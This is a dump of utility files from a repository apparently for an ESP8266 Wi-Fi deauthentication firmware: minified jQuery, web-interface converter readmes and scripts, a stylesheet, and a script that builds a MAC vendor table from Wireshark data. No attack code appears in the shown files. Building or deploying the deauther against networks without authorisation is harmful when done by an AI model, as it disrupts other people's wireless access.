a)Ab(c,a[c],b,e);return d.join("&")},r.fn.extend({serialize:function(){return r.param(this.serializeArray())},serializeArray:function(){return this.map(function(){var a=r.prop(this,"elements");return a?r.makeArray(a):this}).filter(function(){var a=this.type;return this.name&&!r(this).is(":disabled")&&zb.test(this.nodeName)&&!yb.test(a)&&(this.checked||!ja.test(a))}).map(function(a,b){var c=r(this).val();return null==c?null:Array.isArray(c)?r.map(c,function(a){return{name:b.name,value:a.replace(xb,"\r\n")}}):{name:b.name,value:c.replace(xb,"\r\n")}}).get()}});var Bb=/%20/g,Cb=/#.*$/,Db=/([?&])_=[^&]*/,Eb=/^(.*?):[ \t]*([^\r\n]*)$/gm,Fb=/^(?:about|app|app-storage|.+-extension|file|res|widget):$/,Gb=/^(?:GET|HEAD)$/,Hb=/^\/\//,Ib={},Jb={},Kb="*/".concat("*"),Lb=d.createElement("a");Lb.href=tb.href;function Mb(a){return function(b,c){"string"!=typeof b&&(c=b,b="*");var d,e=0,f=b.toLowerCase().match(L)||[];if(r.isFunction(c))while(d=f[e++])"+"===d[0]?(d=d.slice(1)||"*",(a[d]=a[d]||[]).unshift(c)):(a[d]=a[d]||[]).push(c)}}function Nb(a,b,c,d){var e={},f=a===Jb;function g(h){var i;return e[h]=!0,r.each(a[h]||[],function(a,h){var j=h(b,c,d);return"string"!=typeof j||f||e[j]?f?!(i=j):void 0:(b.dataTypes.unshift(j),g(j),!1)}),i}return g(b.dataTypes[0])||!e["*"]&&g("*")}function Ob(a,b){var c,d,e=r.ajaxSettings.flatOptions||{};for(c in b)void 0!==b[c]&&((e[c]?a:d||(d={}))[c]=b[c]);return d&&r.extend(!0,a,d),a}function Pb(a,b,c){var d,e,f,g,h=a.contents,i=a.dataTypes;while("*"===i[0])i.shift(),void 0===d&&(d=a.mimeType||b.getResponseHeader("Content-Type"));if(d)for(e in h)if(h[e]&&h[e].test(d)){i.unshift(e);break}if(i[0]in c)f=i[0];else{for(e in c){if(!i[0]||a.converters[e+" "+i[0]]){f=e;break}g||(g=e)}f=f||g}if(f)return f!==i[0]&&i.unshift(f),c[f]}function Qb(a,b,c,d){var e,f,g,h,i,j={},k=a.dataTypes.slice();if(k[1])for(g in a.converters)j[g.toLowerCase()]=a.converters[g];f=k.shift();while(f)if(a.responseFields[f]&&(c[a.responseFields[f]]=b),!i&&d&&a.dataFilter&&(b=a.dataFilter(b,a.dataType)),i=f,f=k.shift())if("*"===f)f=i;else if("*"!==i&&i!==f){if(g=j[i+" "+f]||j["* "+f],!g)for(e in j)if(h=e.split(" "),h[1]===f&&(g=j[i+" "+h[0]]||j["* "+h[0]])){g===!0?g=j[e]:j[e]!==!0&&(f=h[0],k.unshift(h[1]));break}if(g!==!0)if(g&&a["throws"])b=g(b);else try{b=g(b)}catch(l){return{state:"parsererror",error:g?l:"No conversion from "+i+" to "+f}}}return{state:"success",data:b}}r.extend({active:0,lastModified:{},etag:{},ajaxSettings:{url:tb.href,type:"GET",isLocal:Fb.test(tb.protocol),global:!0,processData:!0,async:!0,contentType:"application/x-www-form-urlencoded; charset=UTF-8",accepts:{"*":Kb,text:"text/plain",html:"text/html",xml:"application/xml, text/xml",json:"application/json, text/javascript"},contents:{xml:/\bxml\b/,html:/\bhtml/,json:/\bjson\b/},responseFields:{xml:"responseXML",text:"responseText",json:"responseJSON"},converters:{"* text":String,"text html":!0,"text json":JSON.parse,"text xml":r.parseXML},flatOptions:{url:!0,context:!0}},ajaxSetup:function(a,b){return b?Ob(Ob(a,r.ajaxSettings),b):Ob(r.ajaxSettings,a)},ajaxPrefilter:Mb(Ib),ajaxTransport:Mb(Jb),ajax:function(b,c){"object"==typeof b&&(c=b,b=void 0),c=c||{};var e,f,g,h,i,j,k,l,m,n,o=r.ajaxSetup({},c),p=o.context||o,q=o.context&&(p.nodeType||p.jquery)?r(p):r.event,s=r.Deferred(),t=r.Callbacks("once memory"),u=o.statusCode||{},v={},w={},x="canceled",y={readyState:0,getResponseHeader:function(a){var b;if(k){if(!h){h={};while(b=Eb.exec(g))h[b[1].toLowerCase()]=b[2]}b=h[a.toLowerCase()]}return null==b?null:b},getAllResponseHeaders:function(){return k?g:null},setRequestHeader:function(a,b){return null==k&&(a=w[a.toLowerCase()]=w[a.toLowerCase()]||a,v[a]=b),this},overrideMimeType:function(a){return null==k&&(o.mimeType=a),this},statusCode:function(a){var b;if(a)if(k)y.always(a[y.status]);else for(b in a)u[b]=[u[b],a[b]];return this},abort:function(a){var b=a||x;return e&&e.abort(b),A(0,b),this}};if(s.promise(y),o.url=((b||o.url||tb.href)+"").replace(Hb,tb.protocol+"//"),o.type=c.method||c.type||o.method||o.type,o.dataTypes=(o.dataType||"*").toLowerCase().match(L)||[""],null==o.crossDomain){j=d.createElement("a");try{j.href=o.url,j.href=j.href,o.crossDomain=Lb.protocol+"//"+Lb.host!=j.protocol+"//"+j.host}catch(z){o.crossDomain=!0}}if(o.data&&o.processData&&"string"!=typeof o.data&&(o.data=r.param(o.data,o.traditional)),Nb(Ib,o,c,y),k)return y;l=r.event&&o.global,l&&0===r.active++&&r.event.trigger("ajaxStart"),o.type=o.type.toUpperCase(),o.hasContent=!Gb.test(o.type),f=o.url.replace(Cb,""),o.hasContent?o.data&&o.processData&&0===(o.contentType||"").indexOf("application/x-www-form-urlencoded")&&(o.data=o.data.replace(Bb,"+")):(n=o.url.slice(f.length),o.data&&(f+=(vb.test(f)?"&":"?")+o.data,delete o.data),o.cache===!1&&(f=f.replace(Db,"$1"),n=(vb.test(f)?"&":"?")+"_="+ub++ +n),o.url=f+n),o.ifModified&&(r.lastModified[f]&&y.setRequestHeader("If-Modified-Since",r.lastModified[f]),r.etag[f]&&y.setRequestHeader("If-None-Match",r.etag[f])),(o.data&&o.hasContent&&o.contentType!==!1||c.contentType)&&y.setRequestHeader("Content-Type",o.contentType),y.setRequestHeader("Accept",o.dataTypes[0]&&o.accepts[o.dataTypes[0]]?o.accepts[o.dataTypes[0]]+("*"!==o.dataTypes[0]?", "+Kb+"; q=0.01":""):o.accepts["*"]);for(m in o.headers)y.setRequestHeader(m,o.headers[m]);if(o.beforeSend&&(o.beforeSend.call(p,y,o)===!1||k))return y.abort();if(x="abort",t.add(o.complete),y.done(o.success),y.fail(o.error),e=Nb(Jb,o,c,y)){if(y.readyState=1,l&&q.trigger("ajaxSend",[y,o]),k)return y;o.async&&o.timeout>0&&(i=a.setTimeout(function(){y.abort("timeout")},o.timeout));try{k=!1,e.send(v,A)}catch(z){if(k)throw z;A(-1,z)}}else A(-1,"No Transport");function A(b,c,d,h){var j,m,n,v,w,x=c;k||(k=!0,i&&a.clearTimeout(i),e=void 0,g=h||"",y.readyState=b>0?4:0,j=b>=200&&b<300||304===b,d&&(v=Pb(o,y,d)),v=Qb(o,v,y,j),j?(o.ifModified&&(w=y.getResponseHeader("Last-Modified"),w&&(r.lastModified[f]=w),w=y.getResponseHeader("etag"),w&&(r.etag[f]=w)),204===b||"HEAD"===o.type?x="nocontent":304===b?x="notmodified":(x=v.state,m=v.data,n=v.error,j=!n)):(n=x,!b&&x||(x="error",b<0&&(b=0))),y.status=b,y.statusText=(c||x)+"",j?s.resolveWith(p,[m,x,y]):s.rejectWith(p,[y,x,n]),y.statusCode(u),u=void 0,l&&q.trigger(j?"ajaxSuccess":"ajaxError",[y,o,j?m:n]),t.fireWith(p,[y,x]),l&&(q.trigger("ajaxComplete",[y,o]),--r.active||r.event.trigger("ajaxStop")))}return y},getJSON:function(a,b,c){return r.get(a,b,c,"json")},getScript:function(a,b){return r.get(a,void 0,b,"script")}}),r.each(["get","post"],function(a,b){r[b]=function(a,c,d,e){return r.isFunction(c)&&(e=e||d,d=c,c=void 0),r.ajax(r.extend({url:a,type:b,dataType:e,data:c,success:d},r.isPlainObject(a)&&a))}}),r._evalUrl=function(a){return r.ajax({url:a,type:"GET",dataType:"script",cache:!0,async:!1,global:!1,"throws":!0})},r.fn.extend({wrapAll:function(a){var b;return this[0]&&(r.isFunction(a)&&(a=a.call(this[0])),b=r(a,this[0].ownerDocument).eq(0).clone(!0),this[0].parentNode&&b.insertBefore(this[0]),b.map(function(){var a=this;while(a.firstElementChild)a=a.firstElementChild;return a}).append(this)),this},wrapInner:function(a){return r.isFunction(a)?this.each(function(b){r(this).wrapInner(a.call(this,b))}):this.each(function(){var b=r(this),c=b.contents();c.length?c.wrapAll(a):b.append(a)})},wrap:function(a){var b=r.isFunction(a);return this.each(function(c){r(this).wrapAll(b?a.call(this,c):a)})},unwrap:function(a){return this.parent(a).not("body").each(function(){r(this).replaceWith(this.childNodes)}),this}}),r.expr.pseudos.hidden=function(a){return!r.expr.pseudos.visible(a)},r.expr.pseudos.visible=function(a){return!!(a.offsetWidth||a.offsetHeight||a.getClientRects().length)},r.ajaxSettings.xhr=function(){try{return new a.XMLHttpRequest}catch(b){}};var Rb={0:200,1223:204},Sb=r.ajaxSettings.xhr();o.cors=!!Sb&&"withCredentials"in Sb,o.ajax=Sb=!!Sb,r.ajaxTransport(function(b){var c,d;if(o.cors||Sb&&!b.crossDomain)return{send:function(e,f){var g,h=b.xhr();if(h.open(b.type,b.url,b.async,b.username,b.password),b.xhrFields)for(g in b.xhrFields)h[g]=b.xhrFields[g];b.mimeType&&h.overrideMimeType&&h.overrideMimeType(b.mimeType),b.crossDomain||e["X-Requested-With"]||(e["X-Requested-With"]="XMLHttpRequest");for(g in e)h.setRequestHeader(g,e[g]);c=function(a){return function(){c&&(c=d=h.onload=h.onerror=h.onabort=h.onreadystatechange=null,"abort"===a?h.abort():"error"===a?"number"!=typeof h.status?f(0,"error"):f(h.status,h.statusText):f(Rb[h.status]||h.status,h.statusText,"text"!==(h.responseType||"text")||"string"!=typeof h.responseText?{binary:h.response}:{text:h.responseText},h.getAllResponseHeaders()))}},h.onload=c(),d=h.onerror=c("error"),void 0!==h.onabort?h.onabort=d:h.onreadystatechange=function(){4===h.readyState&&a.setTimeout(function(){c&&d()})},c=c("abort");try{h.send(b.hasContent&&b.data||null)}catch(i){if(c)throw i}},abort:function(){c&&c()}}}),r.ajaxPrefilter(function(a){a.crossDomain&&(a.contents.script=!1)}),r.ajaxSetup({accepts:{script:"text/javascript, application/javascript, application/ecmascript, application/x-ecmascript"},contents:{script:/\b(?:java|ecma)script\b/},converters:{"text script":function(a){return r.globalEval(a),a}}}),r.ajaxPrefilter("script",function(a){void 0===a.cache&&(a.cache=!1),a.crossDomain&&(a.type="GET")}),r.ajaxTransport("script",function(a){if(a.crossDomain){var b,c;return{send:function(e,f){b=r("<script>").prop({charset:a.scriptCharset,src:a.url}).on("load error",c=function(a){b.remove(),c=null,a&&f("error"===a.type?404:200,a.type)}),d.head.appendChild(b[0])},abort:function(){c&&c()}}}});var Tb=[],Ub=/(=)\?(?=&|$)|\?\?/;r.ajaxSetup({jsonp:"callback",jsonpCallback:function(){var a=Tb.pop()||r.expando+"_"+ub++;return this[a]=!0,a}}),r.ajaxPrefilter("json jsonp",function(b,c,d){var e,f,g,h=b.jsonp!==!1&&(Ub.test(b.url)?"url":"string"==typeof b.data&&0===(b.contentType||"").indexOf("application/x-www-form-urlencoded")&&Ub.test(b.data)&&"data");if(h||"jsonp"===b.dataTypes[0])return e=b.jsonpCallback=r.isFunction(b.jsonpCallback)?b.jsonpCallback():b.jsonpCallback,h?b[h]=b[h].replace(Ub,"$1"+e):b.jsonp!==!1&&(b.url+=(vb.test(b.url)?"&":"?")+b.jsonp+"="+e),b.converters["script json"]=function(){return g||r.error(e+" was not called"),g[0]},b.dataTypes[0]="json",f=a[e],a[e]=function(){g=arguments},d.always(function(){void 0===f?r(a).removeProp(e):a[e]=f,b[e]&&(b.jsonpCallback=c.jsonpCallback,Tb.push(e)),g&&r.isFunction(f)&&f(g[0]),g=f=void 0}),"script"}),o.createHTMLDocument=function(){var a=d.implementation.createHTMLDocument("").body;return a.innerHTML="<form></form><form></form>",2===a.childNodes.length}(),r.parseHTML=function(a,b,c){if("string"!=typeof a)return[];"boolean"==typeof b&&(c=b,b=!1);var e,f,g;return b||(o.createHTMLDocument?(b=d.implementation.createHTMLDocument(""),e=b.createElement("base"),e.href=d.location.href,b.head.appendChild(e)):b=d),f=C.exec(a),g=!c&&[],f?[b.createElement(f[1])]:(f=qa([a],b,g),g&&g.length&&r(g).remove(),r.merge([],f.childNodes))},r.fn.load=function(a,b,c){var d,e,f,g=this,h=a.indexOf(" ");return h>-1&&(d=pb(a.slice(h)),a=a.slice(0,h)),r.isFunction(b)?(c=b,b=void 0):b&&"object"==typeof b&&(e="POST"),g.length>0&&r.ajax({url:a,type:e||"GET",dataType:"html",data:b}).done(function(a){f=arguments,g.html(d?r("<div>").append(r.parseHTML(a)).find(d):a)}).always(c&&function(a,b){g.each(function(){c.apply(this,f||[a.responseText,b,a])})}),this},r.each(["ajaxStart","ajaxStop","ajaxComplete","ajaxError","ajaxSuccess","ajaxSend"],function(a,b){r.fn[b]=function(a){return this.on(b,a)}}),r.expr.pseudos.animated=function(a){return r.grep(r.timers,function(b){return a===b.elem}).length},r.offset={setOffset:function(a,b,c){var d,e,f,g,h,i,j,k=r.css(a,"position"),l=r(a),m={};"static"===k&&(a.style.position="relative"),h=l.offset(),f=r.css(a,"top"),i=r.css(a,"left"),j=("absolute"===k||"fixed"===k)&&(f+i).indexOf("auto")>-1,j?(d=l.position(),g=d.top,e=d.left):(g=parseFloat(f)||0,e=parseFloat(i)||0),r.isFunction(b)&&(b=b.call(a,c,r.extend({},h))),null!=b.top&&(m.top=b.top-h.top+g),null!=b.left&&(m.left=b.left-h.left+e),"using"in b?b.using.call(a,m):l.css(m)}},r.fn.extend({offset:function(a){if(arguments.length)return void 0===a?this:this.each(function(b){r.offset.setOffset(this,a,b)});var b,c,d,e,f=this[0];if(f)return f.getClientRects().length?(d=f.getBoundingClientRect(),b=f.ownerDocument,c=b.documentElement,e=b.defaultView,{top:d.top+e.pageYOffset-c.clientTop,left:d.left+e.pageXOffset-c.clientLeft}):{top:0,left:0}},position:function(){if(this[0]){var a,b,c=this[0],d={top:0,left:0};return"fixed"===r.css(c,"position")?b=c.getBoundingClientRect():(a=this.offsetParent(),b=this.offset(),B(a[0],"html")||(d=a.offset()),d={top:d.top+r.css(a[0],"borderTopWidth",!0),left:d.left+r.css(a[0],"borderLeftWidth",!0)}),{top:b.top-d.top-r.css(c,"marginTop",!0),left:b.left-d.left-r.css(c,"marginLeft",!0)}}},offsetParent:function(){return this.map(function(){var a=this.offsetParent;while(a&&"static"===r.css(a,"position"))a=a.offsetParent;return a||ra})}}),r.each({scrollLeft:"pageXOffset",scrollTop:"pageYOffset"},function(a,b){var c="pageYOffset"===b;r.fn[a]=function(d){return T(this,function(a,d,e){var f;return r.isWindow(a)?f=a:9===a.nodeType&&(f=a.defaultView),void 0===e?f?f[b]:a[d]:void(f?f.scrollTo(c?f.pageXOffset:e,c?e:f.pageYOffset):a[d]=e)},a,d,arguments.length)}}),r.each(["top","left"],function(a,b){r.cssHooks[b]=Pa(o.pixelPosition,function(a,c){if(c)return c=Oa(a,b),Ma.test(c)?r(a).position()[b]+"px":c})}),r.each({Height:"height",Width:"width"},function(a,b){r.each({padding:"inner"+a,content:b,"":"outer"+a},function(c,d){r.fn[d]=function(e,f){var g=arguments.length&&(c||"boolean"!=typeof e),h=c||(e===!0||f===!0?"margin":"border");return T(this,function(b,c,e){var f;return r.isWindow(b)?0===d.indexOf("outer")?b["inner"+a]:b.document.documentElement["client"+a]:9===b.nodeType?(f=b.documentElement,Math.max(b.body["scroll"+a],f["scroll"+a],b.body["offset"+a],f["offset"+a],f["client"+a])):void 0===e?r.css(b,c,h):r.style(b,c,e,h)},b,g?e:void 0,g)}})}),r.fn.extend({bind:function(a,b,c){return this.on(a,null,b,c)},unbind:function(a,b){return this.off(a,null,b)},delegate:function(a,b,c,d){return this.on(b,a,c,d)},undelegate:function(a,b,c){return 1===arguments.length?this.off(a,"**"):this.off(b,a||"**",c)}}),r.holdReady=function(a){a?r.readyWait++:r.ready(!0)},r.isArray=Array.isArray,r.parseJSON=JSON.parse,r.nodeName=B,"function"==typeof define&&define.amd&&define("jquery",[],function(){return r});var Vb=a.jQuery,Wb=a.$;return r.noConflict=function(b){return a.$===r&&(a.$=Wb),b&&a.jQuery===r&&(a.jQuery=Vb),r},b||(a.jQuery=a.$=r),r}); |
Markdown | esp8266_deauther-2/utils/old_web_converter/readme.md | # How to update files inside html folder?
The files related to the Frontend of ESP8266_Deauther are inside html folder.
To reflect on the firmware it needs to be: minified, converted to hex and updated on data.h on esp8266_deauther folder on the root of this project.
The following process can be used:
## Script Mode (Linux/Mac)
**1** Update the desired files on ./html folder
**2** at the command line run the shell script: ./convert_all.sh
**3** open the generated file "data_h_temp" and copy the content (CTRL+C)
**4** Go to data.h and replace the content between the comments like below:
```c
/* constants generated by convert_all.sh - start */
const char data_apscanHTML[] PROGMEM = {0x3c,0x21,0x44,0x4f,0x43...
const char data_attackHTML[] PROGMEM = {0x3c,0x21,0x44,0x4f,0x43...
const char data_errorHTML[] PROGMEM = {0x3c,0x21,0x44,0x4f,0x43,...
const char data_indexHTML[] PROGMEM = {0x3c,0x21,0x44,0x4f,0x43,...
const char data_infoHTML[] PROGMEM = {0x3c,0x21,0x44,0x4f,0x43,0...
const char data_js_apscanJS[] PROGMEM = {0x66,0x75,0x6e,0x63,0x7...
const char data_js_attackJS[] PROGMEM = {0x66,0x75,0x6e,0x63,0x7...
const char data_js_functionsJS[] PROGMEM = {0x66,0x75,0x6e,0x63,...
const char data_js_settingsJS[] PROGMEM = {0x66,0x75,0x6e,0x63,0...
const char data_js_stationsJS[] PROGMEM = {0x66,0x75,0x6e,0x63,0...
const char data_license[] PROGMEM = {0x43,0x6f,0x70,0x79,0x72,0x...
const char data_settingsHTML[] PROGMEM = {0x3c,0x21,0x44,0x4f,0x...
const char data_stationsHTML[] PROGMEM = {0x3c,0x21,0x44,0x4f,0x...
const char data_styleCSS[] PROGMEM = {0x2f,0x2a,0x20,0x47,0x6c,0...
/* constants generated by convert_all.sh - end */
```
## Manual mode
**1** Use a minifier (e.g. htmlcompressor.com) to get your files as small as possible
**2** Open converter.html
**3** Paste the code in the left textfield
**4** Press Convert
**5** Copy the results from the right textfield
**6** Go to data.h and replace the array of the changed file with the copied bytes
**Now compile and upload your new sketch :)** |
esp8266_deauther-2/utils/old_web_converter/style.css | /* Global */
body {
background: #36393e;
color: #bfbfbf;
font-family: sans-serif;
margin: 0;
}
h1 {
font-size: 1.7rem;
margin-top: 1rem;
background: #2f3136;
color: #bfbfbb;
padding: 0.2em 1em;
border-radius: 3px;
border-left: solid #4974a9 5px;
font-weight: 100;
}
h2 {
font-size: 1.1rem;
margin-top: 1rem;
background: #2f3136;
color: #bfbfbb;
padding: 0.4em 1.8em;
border-radius: 3px;
border-left: solid #4974a9 5px;
font-weight: 100;
}
table{
border-collapse: collapse;
}
label{
line-height: 46px;
}
input{
line-height: 46px;
}
.left {
float: left;
}
.right {
float: right;
}
.bold {
font-weight: bold;
}
.red{
color: #F04747;
}
.green{
color:#43B581;
}
.clear {
clear: both;
}
.centered{
text-align: center;
}
.select{
width: 98px !important;
padding: 0 !important;
}
.selected{
background: #4974a9;
}
.status{
width: 120px;
padding-left: 8px;
}
.labelFix {
line-height: 40px;
}
.clickable{
cursor: pointer;
}
#error {
text-align: center;
color: #fff;
background: #af3535;
border-radius: 5px;
padding: 10px;
margin-top: 10px;
}
#closeError{
float: right;
color: #fff;
padding: 0px 10px;
cursor: pointer;
}
#copyright{
font-size: 0.95em;
text-align: center;
margin-top: 3em;
margin-bottom: 3em;
}
/* CHECKBOX */
/* Customize the label (the container) */
.checkBoxContainer {
display: block;
position: relative;
padding-left: 35px;
margin-bottom: 12px;
cursor: pointer;
font-size: 22px;
-webkit-user-select: none;
-moz-user-select: none;
-ms-user-select: none;
user-select: none;
height: 32px;
width: 32px;
}
/* Hide the browser's default checkbox */
.checkBoxContainer input {
position: absolute;
opacity: 0;
cursor: pointer;
}
/* Create a custom checkbox */
.checkmark {
position: absolute;
top: 8px;
left: 0;
height: 28px;
width: 28px;
background-color: #2F3136;
border-radius: 4px;
}
/* When the checkbox is checked, add a blue background */
.checkBoxContainer input:checked ~ .checkmark {
background-color: #4974A9;
}
/* Create the checkmark/indicator (hidden when not checked) */
.checkmark:after {
content: "";
position: absolute;
display: none;
}
/* Show the checkmark when checked */
.checkBoxContainer input:checked ~ .checkmark:after {
display: block;
}
/* Style the checkmark/indicator */
.checkBoxContainer .checkmark:after {
left: 10px;
top: 7px;
width: 4px;
height: 10px;
border: solid white;
border-width: 0 3px 3px 0;
-webkit-transform: rotate(45deg);
-ms-transform: rotate(45deg);
transform: rotate(45deg);
}
/* ERROR */
.hide {
display: none;
}
.show {
display: block !important;
animation-name: fadeIn;
animation-duration: 1s;
}
@keyframes fadeIn {
0% {opacity: 0;}
100% {opacity: 1;}
}
hr {
background: #3e4146;
}
a {
color: #5281bb;
text-decoration: none;
}
a:hover {
color: #95b8e4;
}
li{
margin: 4px 0;
}
/* Meter */
.meter_background{
background: #42464D;
width: 100%;
min-width: 90px;
}
.meter_forground{
color: #fff;
padding: 4px 0;
/* + one of the colors below
(width will be set by the JS) */
}
.meter_green{
background: #43B581;
}
.meter_orange{
background: #FAA61A;
}
.meter_red{
background: #F04747;
}
.meter_value{
padding-left: 8px;
}
/* Tables */
table {
width: 100%;
margin-bottom: 50px;
}
th, td {
padding: 10px 6px;
text-align: left;
border-bottom: 1px solid #5d5d5d;
}
/* Navigation bar */
nav {
display: block;
padding: 8px 10px;
background: #2f3136;
}
nav a {
color: #bfbfbf;
padding: 0.5em;
display: inline-block;
text-decoration: none;
}
nav a:hover{
background: #36393f;
color:#cecece;
border-radius: 4px;
}
/* Inputs and buttons */
.upload-script, .button, button, input[type="submit"], input[type="reset"], input[type="button"] {
display: inline-block;
height: 38px;
padding: 0 25px;
color:#fff;
text-align: center;
font-size: 11px;
font-weight: 600;
line-height: 38px;
letter-spacing: .1rem;
text-transform: uppercase;
text-decoration: none;
white-space: nowrap;
background: #2f3136;
border-radius: 4px;
border: none;
cursor: pointer;
box-sizing: border-box;
}
button:hover, input[type="submit"]:hover, input[type="reset"]:hover, input[type="button"]:hover {
background: #42444a;
}
/* Forms */
input[type="email"], input[type="number"], input[type="search"], input[type="text"], input[type="tel"], input[type="url"], input[type="password"], textarea, select {
height: 38px;
padding: 6px 10px; /* The 6px vertically centers text on FF, ignored by Webkit */
background-color: #2f3136;
border-radius: 4px;
box-shadow: none;
box-sizing: border-box;
color: #d4d4d4;
border: none;
}
.setting {
width: 100% !important;
max-width: 284px !important;
}
input[type="file"] {
display: none;
}
/* ==== GRID SYSTEM ==== */
.container {
width: 100%;
margin-left: auto;
margin-right: auto;
max-width: 1140px;
}
.row {
position: relative;
width: 100%;
}
.row [class^="col"] {
float: left;
margin: 0.25rem 2%;
min-height: 0.125rem;
}
.col-1,
.col-2,
.col-3,
.col-4,
.col-5,
.col-6,
.col-7,
.col-8,
.col-9,
.col-10,
.col-11,
.col-12 {
width: 96%;
}
.row::after {
content: "";
display: table;
clear: both;
}
.hidden-sm {
display: none;
}
@media only screen and (min-width: 45em) {
.col-1 {
width: 4.33%;
}
.col-2 {
width: 12.66%;
}
.col-3 {
width: 21%;
}
.col-4 {
width: 29.33%;
}
.col-5 {
width: 37.66%;
}
.col-6 {
width: 46%;
}
.col-7 {
width: 54.33%;
}
.col-8 {
width: 62.66%;
}
.col-9 {
width: 71%;
}
.col-10 {
width: 79.33%;
}
.col-11 {
width: 87.66%;
}
.col-12 {
width: 96%;
}
.hidden-sm {
display: block;
}
} |
|
Markdown | esp8266_deauther-2/utils/vendor_list_updater/README.md | `python3 update_manuf.py -o oui.h -s`
This Python script updates the manufacturer list oui.h in deauther2.0/esp8266_deauther.
The -s option is for creating a limited list of the top 1000 vendors. That is enough for most devices and it makes the list fit in 512kb. |
Python | esp8266_deauther-2/utils/vendor_list_updater/update_manuf.py | #/usr/bin/env python3
# This scripts downloads the last OUI manufaturer file from the Whireshark
# project and converts it to esp8266_deauther format
#
# Copyright (c) 2018 xdavidhu
# https://github.com/xdavidhu/
#
import argparse
from urllib.request import urlopen
WS_MANUF_FILE_URL = "https://code.wireshark.org/review/gitweb?p=wireshark.git;a=blob_plain;f=manuf"
macs = []
vendors = []
tempVendors = []
def padhex(s):
return '0x' + s[2:].zfill(2)
def parse_options():
parser = argparse.ArgumentParser()
parser.add_argument("-o", "--output", help="Output file name for macs list", required=True)
parser.add_argument("-s", "--small", action='store_true', help="Generate small file only with most used 10 000 macs")
parser.add_argument("-u", "--url", help="Wireshark oui/manuf file url")
opt = parser.parse_args()
return opt
def generate_lists(url, output, small):
global tempVendors
global vendors
global macs
if url:
data = urlopen(url)
else:
data = urlopen(WS_MANUF_FILE_URL)
lines = data.readlines()
for line in lines:
line = line.decode()
if line.startswith('#') or line.startswith('\n'):
continue
mac, short_desc, *rest = line.strip().split('\t')
short_desc = short_desc[0:8]
short_desc = short_desc.encode("ascii", "ignore").decode()
mac_octects = len(mac.split(':'))
if mac_octects == 6:
continue
else:
inList = False
for vendor in tempVendors:
if vendor[0] == short_desc:
inList = True
vendor[1] += 1
break
if not inList:
tempVendors.append([short_desc, 1])
if small:
tempVendors.sort(key=lambda x: x[1])
tempVendors.reverse()
#tempVendors = tempVendors[:1000]
for vendor in tempVendors:
vendors.append(vendor[0])
for line in lines:
line = line.decode()
if line.startswith('#') or line.startswith('\n'):
continue
mac, short_desc, *rest = line.strip().split('\t')
short_desc = short_desc[0:8]
short_desc = short_desc.encode("ascii", "ignore").decode()
mac_octects = len(mac.split(':'))
if mac_octects == 6:
continue
else:
for vendor in vendors:
if vendor == short_desc:
index = vendors.index(vendor)
macs.append([mac, index])
generate_files(output)
def generate_files(output):
global tempVendors
global vendors
global macs
# 'vendors' list
vendorsTxt = ""
for vendor in vendors:
vendor = vendor.ljust(8, '\0')
hex_vendor = ", 0x".join("{:02x}".format(ord(c)) for c in vendor)
line = "0x" + hex_vendor
vendorsTxt += line + ",\n"
vendorsTxt = vendorsTxt[:-2] + "\n"
# 'macs' list
macsTxt = ""
for mac in macs:
macaddr = mac[0]
vendorindex = mac[1]
(oc1, oc2, oc3) = macaddr.split(':')
if vendorindex > 255:
num = vendorindex
index_bytes = []
while num > 0:
byte = num % 0x100
index_bytes.append(byte)
num //= 0x100
hex_index = ""
for byte in index_bytes:
hex_index += padhex(hex(byte)) + ", "
hex_index = hex_index[:-2]
else:
hex_index = padhex(hex(vendorindex)) + ", 0x00"
line = "0x" + oc1.upper() + ", " + "0x" + oc2.upper() + ", " + "0x" + oc3.upper() + ", " + hex_index
macsTxt += line + ",\n"
macsTxt = macsTxt[:-2] + "\n"
# Saving to file
if output:
with open(output, 'w') as out_file:
out_file.write("#ifndef oui_h\n#define oui_h\n/*\n Based on Wireshark manufacturer database\n source: https://www.wireshark.org/tools/oui-lookup.html\n Wireshark is released under the GNU General Public License version 2\n*/\n\n#define ENABLE_MAC_LIST // comment out if you want to save memory\n\n")
out_file.write("const static uint8_t data_vendors[] PROGMEM = {\n#ifdef ENABLE_MAC_LIST\n")
out_file.write(vendorsTxt)
out_file.write("#endif\n};\n")
out_file.write("const static uint8_t data_macs[] PROGMEM = {\n#ifdef ENABLE_MAC_LIST\n")
out_file.write(macsTxt)
out_file.write("#endif\n};\n#endif")
out_file.close()
print("Done.")
if __name__ == "__main__":
options = parse_options()
generate_lists(options.url, options.output, options.small) |
Markdown | esp8266_deauther-2/utils/web_converter/readme.md | Use this converter to minify and gzip everything in the `web_interface` folder and put it in `esp8266_deauther/data/web/`.
This script will also generate a new `webfiles.h` file and replace the old in `esp8266_deauther`.
Copyright goes to [@xdavidhu](http://github.com/xdavidhu/).
**A few notes:**
- you need python3 to run this script
- you need to install the anglerfish package: `sudo python3 -m pip install anglerfish`
- be sure to run the script from its current position
- `.lang` files will always go in the `/lang` folder
- `.js` files will always go int the `/js` folder
- `.json` files will be ignored and not copied
- only `.html` and `.css` will be minified before being gzipped (minifying JS can make problems) |
Python | esp8266_deauther-2/utils/web_converter/webConverter.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Created by: xdavidhu
import os
import gzip
import argparse
import binascii
from pathlib import Path, PurePath
try:
from css_html_js_minify.minify import process_single_html_file, process_single_js_file, process_single_css_file
except ModuleNotFoundError:
print("\n[!] Requirements are not satisfied. Please install the 'anglerfish' package by running 'sudo python3 -m pip install anglerfish'.\n")
exit()
parser = argparse.ArgumentParser(usage="webConverter.py --repopath [path-to-repo]")
parser.add_argument("--repopath", type=str,
help='Path to the repo, if not set make sure to run the script from [repo]/utils/web_converter_python/ directory')
print("\nwebConverter for the deauther2.0 by @xdavidhu\n")
args = parser.parse_args()
if args.repopath != None:
parent = args.repopath
print("[+] Using manual path '" + args.repopath + "'\n")
else:
p = Path.cwd()
parent = p.parent.parent
license_file_path = str(os.path.join(str(parent), "LICENSE"))
q = PurePath('esp8266_deauther')
arduino_file_path = str(os.path.join(str(parent / q), "webfiles.h"))
datadir = parent / q
q = PurePath('web_interface')
dir = parent / q
q = PurePath('data')
datadir = datadir / q
if not os.path.exists(str(datadir)):
os.mkdir(str(datadir))
q = PurePath('web')
compressed = datadir / q
if not os.path.exists(str(compressed)):
os.mkdir(str(compressed))
html_files = []
css_files = []
js_files = []
lang_files = []
progmem_definitions = ""
copy_files_function = ""
webserver_events = ""
load_lang = ""
filelist = Path(dir).glob('**/*')
for x in filelist:
if x.is_file():
if x.parts[-2] == "compressed" or x.parts[-3] == "compressed":
continue
if x.suffix == ".html":
html_files.append(x)
elif x.suffix == ".css":
css_files.append(x)
elif x.suffix == ".js":
js_files.append(x)
